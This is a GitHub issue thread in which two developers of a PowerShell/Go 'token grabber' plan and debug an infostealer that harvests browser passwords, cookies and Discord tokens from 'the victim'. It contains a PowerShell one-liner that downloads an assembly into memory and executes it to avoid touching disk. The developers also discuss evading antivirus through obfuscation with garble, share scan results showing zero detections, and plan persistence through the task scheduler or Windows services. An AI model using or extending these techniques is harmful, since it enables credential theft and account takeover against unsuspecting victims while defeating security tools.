### ISSUE TITLE
Ideas

### ISSUE THREAD

**Issue by KDot227** [ChildrenOfYahweh/Powershell-Token-Grabber#152]
@Chainski So what we can do with the main.exe is a few things.

1.) we leave it how it is and just worry about making obfuscation. 

2.) we drop it and make a different backend (golang, rust, nim, etc)

3.) we integrate it into powershell. (It is possible but powershell isn't really made to handle it so very large databases will process VERY slow.) Something like this might help too https://stackoverflow.com/questions/1758779/retrieving-data-using-select-sql-statement-in-powershell We would also have to figure out how to do it for something that isn't a server environment but I bet we could figure it out. But like I said it will be a LOT slower than calling on a different backend.

4.) we make multiple backends for fun and have the user pick what they want in the UI. (python, golang, js, whatever)

5.) Just do it all in c# and compile it in powershell. This could work but compiling c# in powershell gets very weird with referenced assemblies and I just don't think it's a good idea but its for sure an option. 

That's all I can think of right now. If you have any suggestions I can give you my tele/discord or you can drop it here.

**Comment by KDot227** [comment]
Just lmk what u think tbh I was just brain storming

**Comment by Chainski** [comment]
> drop it and make a different backend

Drop it and make a different backend preferably ```nim``` since its should be alot better.  Python tends to use more RAM compared to Nim due to its dynamic typing and memory management overhead. 

_Remember that we must not drop files on the disk if we want to evade av._

Also if you do it in C# , it can hosted on the web & downloaded to memory on runtime using powershell using this oneliner 

```([Reflection.Assembly]::Load((New-Object net.webclient).DownloadData('https://127.0.0.1/main.exe'))).EntryPoint.Invoke($n,$n)```

**Comment by KDot227** [comment]
> > drop it and make a different backend
> 
> Drop it and make a different backend preferably `nim` since it should be alot better. Python tends to use more RAM compared to Nim due to its dynamic typing and memory management overhead.
> 
> _Remember that we must not drop files on the disk if we want to evade av._
> 
> Also if you do it in C# , it can hosted on the web & downloaded to memory on runtime using powershell using this oneliner
> 
> `([Reflection.Assembly]::Load((New-Object net.webclient).DownloadData('https://127.0.0.1/main.exe'))).EntryPoint.Invoke($n,$n)`

Only issue I see with nim is the fact that we need dependencies so dropping to disk would need to be a must. Golang on the other hand wouldn't need to touch disk, neither would c#, rust or c.

**Comment by Chainski** [comment]
> > > drop it and make a different backend
> > 
> > 
> > Drop it and make a different backend preferably `nim` since it should be alot better. Python tends to use more RAM compared to Nim due to its dynamic typing and memory management overhead.
> > _Remember that we must not drop files on the disk if we want to evade av._
> > Also if you do it in C# , it can hosted on the web & downloaded to memory on runtime using powershell using this oneliner
> > `([Reflection.Assembly]::Load((New-Object net.webclient).DownloadData('https://127.0.0.1/main.exe'))).EntryPoint.Invoke($n,$n)`
> 
> Only issue I see with nim is the fact that we need dependencies so dropping to disk would need to be a must. Golang on the other hand wouldn't need to touch disk, neither would c#, rust or c.

prolly ```golang``` or ```rust``` would be ok for now since its best to use a native stub which wouldn't require much dependencies.

**Comment by KDot227** [comment]
> > > > drop it and make a different backend
> 
> > > 
> 
> > > 
> 
> > > Drop it and make a different backend preferably `nim` since it should be alot better. Python tends to use more RAM compared to Nim due to its dynamic typing and memory management overhead.
> 
> > > _Remember that we must not drop files on the disk if we want to evade av._
> 
> > > Also if you do it in C# , it can hosted on the web & downloaded to memory on runtime using powershell using this oneliner
> 
> > > `([Reflection.Assembly]::Load((New-Object net.webclient).DownloadData('https://127.0.0.1/main.exe'))).EntryPoint.Invoke($n,$n)`
> 
> > 
> 
> > Only issue I see with nim is the fact that we need dependencies so dropping to disk would need to be a must. Golang on the other hand wouldn't need to touch disk, neither would c#, rust or c.
> 
> 
> 
> prolly ```golang``` or ```rust``` would be ok for now since its best to use a native stub which wouldn't require much dependencies.

Bet. I'll make the one in golang tomorrow. If you know rust that would help a lot but I can try and figure it out.

**Comment by KDot227** [comment]
@Chainski if Golang can cross compile we can make github compile the code and add it to releases that way the user doesn't have to use anything precompiled. And we can supply hashes etc.

**Comment by Chainski** [comment]
> @Chainski if Golang can cross compile we can make github compile the code and add it to releases that way the user doesn't have to use anything precompiled. And we can supply hashes etc.

Ok try and see how that works.

**Comment by KDot227** [comment]
> > drop it and make a different backend
> 
> Drop it and make a different backend preferably `nim` since it should be alot better. Python tends to use more RAM compared to Nim due to its dynamic typing and memory management overhead.
> 
> _Remember that we must not drop files on the disk if we want to evade av._
> 
> Also if you do it in C# , it can hosted on the web & downloaded to memory on runtime using powershell using this oneliner
> 
> `([Reflection.Assembly]::Load((New-Object net.webclient).DownloadData('https://127.0.0.1/main.exe'))).EntryPoint.Invoke($n,$n)`

in theory this should work now, do you mind testing? I'm super busy rn but I can probably get to it tomorrow too. Also new grabber backend idk if you say but it's a LOT less detected and another person should be making pr's soon to decrease detections and help with things.

**Comment by KDot227** [comment]
I also plan on moving away from task scheduler and moving to windows services due to golang's compatibility.

**Comment by Chainski** [comment]
I did a scan on ```grabber.exe```

https://avcheck.net/id/6SDznEdGas40

Don't judge this scan a 100% but its detected by

```Kaspersky Internet Security```	
```ZoneAlarm Antivirus```	

The Grabbing functions are performing ok so far but there are issues I will list them below. For the new golang grabber you just need to run grabber.exe without dropping it to disk

## Fix These 
passwords.json returns only websites, NO PASSWORDS
discord.json returns ```null``` 

NOTE: **For the cookie grabbing its best to use netscape instead of json**

Additionally transitioning from using the task manager to relying on Windows services could present challenges especially with powershell due to the fact that all services operate under a system token, 
specifically running as "NT AUTHORITY\SYSTEM."

**Comment by KDot227** [comment]
> I did a scan on ```grabber.exe```
> 
> 
> 
> https://avcheck.net/id/6SDznEdGas40
> 
> 
> 
> Don't judge this scan a 100% but its detected by
> 
> 
> 
> ```Kaspersky Internet Security```	
> 
> ```ZoneAlarm Antivirus```	
> 
> 
> 
> The Grabbing functions are performing ok so far but there are issues I will list them below. For the new golang grabber you just need to run grabber.exe without dropping it to disk
> 
> 
> 
> ## Fix These 
> 
> passwords.json returns only websites, NO PASSWORDS
> 
> discord.json returns ```null``` 
> 
> 
> 
> NOTE: **For the cookie grabbing its best to use netscape instead of json**
> 
> 
> 
> Additionally transitioning from using the task manager to relying on Windows services could present challenges especially with powershell due to the fact that all services operate under a system token, 
> 
> specifically running as "NT AUTHORITY\SYSTEM."
> 
> 

I got the same scan results too, I will look into things I can do to get rid of those detections but it's already better than the python counter part lol. A lot of optimizations needed also.

**Comment by KDot227** [comment]
I will address the rest of the issues when I get home.

**Comment by KDot227** [comment]
@Chainski so I took a look and this is what I found out.

1.) The no USERNAME PASSWORD is due to the fact that it get's those values straight out of the logins section. This means you are logged into all of those sites but you may have just pressed ignore to save password, I know this is definitely the case because the only password it actually got was the one I saved with a test form.

**Comment by KDot227** [comment]
2.) Discord.json does work for me, can you use an fmt.Println to see if it's getting any tokens before they're checked?

**Comment by KDot227** [comment]
Right now I'm working on making ads streams so we don't have to close browsers to get things like cookies. Also, I still need to look up how netscape cookies are formatted but once I finish that it should be wraps.

**Comment by KDot227** [comment]
ALSO last thing. If you think you have the time of day (I hate windows api) to get the screenshot.go to actually do something without using extra libraries be my guest lol I gave up very fast.

**Comment by Chainski** [comment]
> @Chainski so I took a look and this is what I found out.
> 
> 1.) The no USERNAME PASSWORD is due to the fact that it get's those values straight out of the logins section. This means you are logged into all of those sites but you may have just pressed ignore to save password, I know this is definitely the case because the only password it actually got was the one I saved with a test form.

By default I always click no so prolly that's the problem.

**Comment by Chainski** [comment]
> 2.) Discord.json does work for me, can you use an fmt.Println to see if it's getting any tokens before they're checked?

I might have to run the tool again and make some checks

**Comment by KDot227** [comment]
> > @Chainski so I took a look and this is what I found out.
> > 1.) The no USERNAME PASSWORD is due to the fact that it get's those values straight out of the logins section. This means you are logged into all of those sites but you may have just pressed ignore to save password, I know this is definitely the case because the only password it actually got was the one I saved with a test form.
> 
> By default I always click no so prolly that's the problem.

now that I do see that though we can always parse through that to make a logins,json then a passwords.json so you can see what they're already logged into 🤷

**Comment by Chainski** [comment]
> > > @Chainski so I took a look and this is what I found out.
> > > 1.) The no USERNAME PASSWORD is due to the fact that it get's those values straight out of the logins section. This means you are logged into all of those sites but you may have just pressed ignore to save password, I know this is definitely the case because the only password it actually got was the one I saved with a test form.
> > 
> > 
> > By default I always click no so prolly that's the problem.
> 
> now that I do see that though we can always parse through that to make a logins,json then a passwords.json so you can see what they're already logged into 🤷

Understanding JSON files is straightforward; you just need to address a few bugs. I will try and do some more testing later.

**Comment by KDot227** [comment]
@Chainski https://avcheck.net/id/37TKlsiZk47X

**Comment by KDot227** [comment]
newest version compiled with garble on my machine.

**Comment by Chainski** [comment]
> newest version compiled with garble on my machine.

```
https://www.kleenscan.com/scan_result/4e4c3b1afb4d019ca041ec65d588878e0309e562692cb38f361e8e4d583bbf27
```
**No engine(s) detected this file.**

Also you could try using ```netscape``` when collecting cookies in future versions.

**Comment by KDot227** [comment]
> > newest version compiled with garble on my machine.
> 
> ```
> https://www.kleenscan.com/scan_result/4e4c3b1afb4d019ca041ec65d588878e0309e562692cb38f361e8e4d583bbf27
> ```
> 
> **No engine(s) detected this file.**
> 
> Also you could try using `netscape` when collecting cookies in future versions.

yes many people have complained about that I am working on it right now.

**Comment by KDot227** [comment]
@Chainski is there anything that has to be specific for netscape? I can't find any good sources on it. I can check with smug or addidix and see what they did too.

**Comment by KDot227** [comment]
I see how he did it now.

```py
f.write(f"{host_key}\t{'FALSE' if expires_utc == 0 else 'TRUE'}\t{path}\t{'FALSE' if host_key.startswith('.') else 'TRUE'}\t{expires_utc}\t{name}\t{value}\n")
```

**Comment by KDot227** [comment]
adding tomorrow when I'm not tired asf

**Comment by KDot227** [comment]
@Chainski done

**Comment by KDot227** [comment]
it's also working when imported to json (to and from)

**Comment by Chainski** [comment]
> it's also working when imported to json (to and from)

Great everthing works perfectly now, except that the victim needs to have discord installed or else the token grab does't work.
prolly you would have to make the token grab also work If they are logged in via a web browser eg. ```chrome```, ```brave``` etc.
